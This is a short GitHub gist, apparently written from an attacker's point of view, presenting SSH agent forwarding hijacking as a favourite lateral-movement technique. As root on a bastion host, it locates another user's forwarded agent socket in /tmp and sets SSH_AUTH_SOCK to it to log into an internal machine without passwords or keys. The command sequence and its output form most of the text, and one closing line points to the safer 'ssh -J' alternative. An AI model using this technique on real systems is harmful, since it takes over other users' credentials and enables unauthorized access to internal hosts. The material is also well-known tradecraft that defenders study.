Skip to content

Instantly share code, notes, and snippets.

@11philip22

11philip22/SSH Agent Forwarding.md

Forked from int0x80/SSH Agent Forwarding.md
Created February 25, 2021 10:15
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 11philip22/b14d322ca590711a04f95e07b217529e to your computer and use it in GitHub Desktop.
Save 11philip22/b14d322ca590711a04f95e07b217529e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
SSH Agent Forwarding.md

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

This post explains it well and details the safer ssh -J alternative.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment